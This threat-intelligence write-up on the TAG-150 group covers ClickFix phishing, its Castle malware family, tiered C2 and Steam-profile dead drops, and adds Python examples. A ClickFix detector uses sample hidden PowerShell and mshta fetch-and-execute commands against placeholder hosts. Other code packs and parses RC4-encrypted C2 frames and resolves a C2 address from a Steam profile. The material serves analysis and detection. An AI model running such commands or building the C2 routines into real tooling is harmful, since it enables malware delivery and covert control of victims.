TAG-150 Hackers Deploying Self-Developed Malware Families to Attack Organizations


A newly identified threat actor, designated TAG-150, has been active since at least March 2025 and stands out for deploying several malware families it develops itself rather than buying in.

TAG-150 has developed and deployed CastleLoader, CastleBot and a previously undocumented remote access trojan, CastleRAT; the latter marks a step up in the group's operational capabilities.

Infection Techniques

The group primarily initiates infections through Cloudflare-themed “ClickFix” phishing pages and fraudulent GitHub repositories. A ClickFix page imitates a Cloudflare verification prompt and instructs the visitor to paste a PowerShell command into the Run dialog or a terminal. Because the victim executes the command themselves, no file is ever downloaded through the browser, so download-based and mail-gateway controls are sidestepped.

Of the users who interacted with the malicious links, 28.7% ended up infected, a high conversion rate for a social-engineering lure.
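A ClickFix infection leaves a characteristic process-creation trail: an interpreter or LOLBin spawned from explorer.exe (the Run dialog or a user-opened console) with a command line that fetches and executes something, often hidden and often ending in a comment that makes the visible part look like a CAPTCHA step. The following detection logic is an added example, not code from the article or from TAG-150's tooling; it runs over constructed Sysmon Event ID 1 records serialised as JSON lines (field names follow Sysmon conventions, the events themselves are invented), including one that uses PowerShell's -EncodedCommand.

```python
"""Heuristic detection of ClickFix-style command execution (added example)."""
import base64
import json
import re

# Interpreters and LOLBins a pasted ClickFix command typically lands in.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "certutil.exe"}
# Win+R (Run dialog) and a user-opened console both give explorer.exe as the parent.
INTERACTIVE_PARENTS = {"explorer.exe"}

TOKENS = {
    "download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|net\.webclient)\b", re.I),
    "execute": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hide": re.compile(r"-(w|windowstyle)\s+hidden\b|-nop\b|-noprofile\b|-(ep|executionpolicy)\s+bypass\b", re.I),
    "remote": re.compile(r"https?://", re.I),
    # Trailing comment that makes the pasted line look like a verification step.
    "lure": re.compile(r"#.*\b(i am not a robot|captcha|verification)\b", re.I),
}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    if image not in LOLBINS:
        return 0, []
    reasons = []
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-command")
        text += " " + decoded          # scan the decoded script too
    reasons += [name for name, rx in TOKENS.items() if rx.search(text)]
    if parent in INTERACTIVE_PARENTS:
        reasons.append("parent=" + parent)
    return len(reasons), reasons


def detect_clickfix(lines, threshold=2):
    """Return the events whose score reaches the threshold."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["ProcessId"], "score": score, "reasons": reasons})
    return hits


# --- constructed sample events (not real telemetry) ---
def sample_event(pid, parent, image, cmd):
    return json.dumps({"EventID": 1, "ProcessId": pid, "ParentImage": parent,
                       "Image": image, "CommandLine": cmd})

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ENCODED = base64.b64encode("iex (iwr http://example.invalid/p)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    sample_event(4412, r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/verify)" # ✅ I am not a robot'),
    sample_event(4500, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    sample_event(4800, r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    sample_event(5120, r"C:\Windows\explorer.exe", PS, f"powershell -nop -w hidden -enc {SAMPLE_ENCODED}"),
    sample_event(6001, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/fix.hta"),
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit)
```

The scheduled backup script (explicit -ExecutionPolicy Bypass, but a service parent and no download or execute token) stays below the threshold, while the mshta launch from explorer.exe with a remote URL is flagged on parentage plus remote fetch alone. Tune the threshold and token list to your environment; the decode step matters because a ClickFix command hidden behind -EncodedCommand otherwise shows none of the download or execute tokens.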

Infrastructure and Operations

Analysts identified a multi-tiered infrastructure behind TAG-150’s operations, with command-and-control split across four tiers:

  • Tier 1: Victim-facing servers hosting various malware families.
  • Tier 2: Intermediate servers accessed via RDP.
  • Tier 3 and Tier 4: Used for operational management and backup.

This infrastructure design suggests advanced operational security and redundancy planning.

Malware Ecosystem

Within TAG-150’s ecosystem CastleLoader and CastleBot act as loaders: the initial infection is used to deliver secondary payloads, including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and information stealers such as Stealc, RedLine Stealer, and Rhadamanthys Stealer.

This diverse payload delivery capability indicates a Malware-as-a-Service operation or partnerships with other cybercriminal groups.

Advanced Persistence and Evasion Mechanisms

CastleRAT is the most technically advanced component of TAG-150’s arsenal and exists in both Python and C variants. It speaks a custom binary protocol with RC4 encryption to obscure its C2 traffic; note that RC4 with a key embedded in the sample provides obfuscation rather than real confidentiality, since an analyst who recovers the key from the binary can decrypt captured traffic.
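To show what decrypting such a channel involves once the key is known, here is an added example that is not CastleRAT's real protocol: the RC4 routine is the standard algorithm, but the frame layout (2-byte magic, 4-byte big-endian body length, then an RC4-encrypted type byte plus payload), the restart of the keystream per frame and the key are assumptions. The parser copes with several frames concatenated in one TCP read and with a trailing partial frame.

```python
"""RC4 keystream plus a hypothetical length-prefixed C2 frame (added example)."""
import struct


def rc4_keystream(key: bytes):
    """Generator yielding RC4 keystream bytes for `key` (KSA, then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                               # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (RC4 is symmetric): XOR the data with the keystream."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


MAGIC = b"CR"                  # hypothetical frame marker, not CastleRAT's
HEADER = struct.Struct(">2sI")  # magic + big-endian body length


def pack_frame(key: bytes, msg_type: int, payload: bytes) -> bytes:
    """Build one frame. The keystream restarts for every frame (assumed design)."""
    body = rc4(key, bytes([msg_type]) + payload)
    return HEADER.pack(MAGIC, len(body)) + body


def parse_frames(key: bytes, stream: bytes):
    """Split a byte stream into (type, payload) tuples; return the unparsed tail."""
    frames, off = [], 0
    while off + HEADER.size <= len(stream):
        magic, length = HEADER.unpack_from(stream, off)
        if magic != MAGIC:
            raise ValueError(f"bad magic at offset {off}")
        start, end = off + HEADER.size, off + HEADER.size + length
        if end > len(stream):      # incomplete frame: keep it for the next read
            break
        body = rc4(key, stream[start:end])
        if not body:
            raise ValueError(f"empty frame body at offset {off}")
        frames.append((body[0], body[1:]))
        off = end
    return frames, stream[off:]


if __name__ == "__main__":
    key = b"k"                     # constructed key for the demo
    blob = pack_frame(key, 1, b"beacon") + pack_frame(key, 2, b"cmd")
    print(parse_frames(key, blob))
```

Restarting the keystream for each frame is the weakness worth knowing: two frames encrypted under the same key XOR to the XOR of their plaintexts, so a known beacon format recovers keystream bytes and with them the start of every other message, key or no key.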

Both variants query the geolocation service ip-api.com to learn the victim’s location, which lets the operators profile or geofence infections; an outbound request to ip-api.com from an unexpected process is itself a useful indicator. The C variant adds keylogging, screen capture, clipboard monitoring, and process injection.

Recent developments include C2 dead drops hosted on Steam Community pages: the implant fetches a profile page on the legitimate, high-reputation site and parses the real C2 address out of operator-controlled text, so the server can be rotated by editing the profile and the first connection never goes to attacker infrastructure. Persistence is maintained through registry modifications, while the Python variant deletes itself after execution to hinder forensic recovery.
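The dead-drop resolver side of this is short enough to show end to end. The code below is an added example, not TAG-150's format: it assumes the address sits base64-encoded between fixed marker strings in the persona name of a Steam profile page, and the page snippet, markers and address are all constructed. The resolver validates that what it decodes is really an ip:port pair, so a decoy or a corrupted profile cannot steer it to an arbitrary string.

```python
"""Resolve a C2 endpoint from a constructed Steam-profile dead drop (added example)."""
import base64
import html
import ipaddress
import re
from typing import Optional, Tuple

START_MARK = END_MARK = "|dd|"   # hypothetical markers around the encoded address
NAME_RE = re.compile(r'<span class="actual_persona_name">(.*?)</span>', re.S)


def extract_persona_name(page: str) -> Optional[str]:
    """Pull the profile's display name out of the page HTML."""
    m = NAME_RE.search(page)
    return html.unescape(m.group(1)).strip() if m else None


def decode_token(name: str) -> Optional[str]:
    """Return the decoded text between the markers, or None if absent/invalid."""
    s = name.find(START_MARK)
    if s < 0:
        return None
    s += len(START_MARK)
    e = name.find(END_MARK, s)
    if e < 0:
        return None
    try:
        return base64.b64decode(name[s:e], validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_endpoint(text: str) -> Optional[Tuple[str, int]]:
    """Accept only a literal IP address and port; anything else is rejected."""
    host, sep, port = text.rpartition(":")
    if not sep or not port.isdigit():
        return None
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    p = int(port)
    if not 0 < p < 65536:
        return None
    return str(ip), p


def resolve_c2(page: str) -> Optional[Tuple[str, int]]:
    """Full chain: HTML -> persona name -> marked token -> validated endpoint."""
    name = extract_persona_name(page)
    if name is None:
        return None
    token = decode_token(name)
    return parse_endpoint(token) if token else None


# --- constructed sample page (not a real profile); 198.51.100.0/24 is documentation space ---
SAMPLE_TOKEN = base64.b64encode(b"198.51.100.23:4443").decode()
SAMPLE_PAGE = f"""<html><body>
<div class="profile_header_centered_persona">
  <span class="actual_persona_name">player_one |dd|{SAMPLE_TOKEN}|dd|</span>
</div>
</body></html>"""

if __name__ == "__main__":
    print(resolve_c2(SAMPLE_PAGE))
```

From the defender's side the useful signal is the fetch itself: a process that is not the Steam client requesting steamcommunity.com profile pages, followed shortly by a connection to the address found on that page.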

These evasion methods, along with anti-detection services, demonstrate TAG-150’s commitment to operational longevity and stealth.
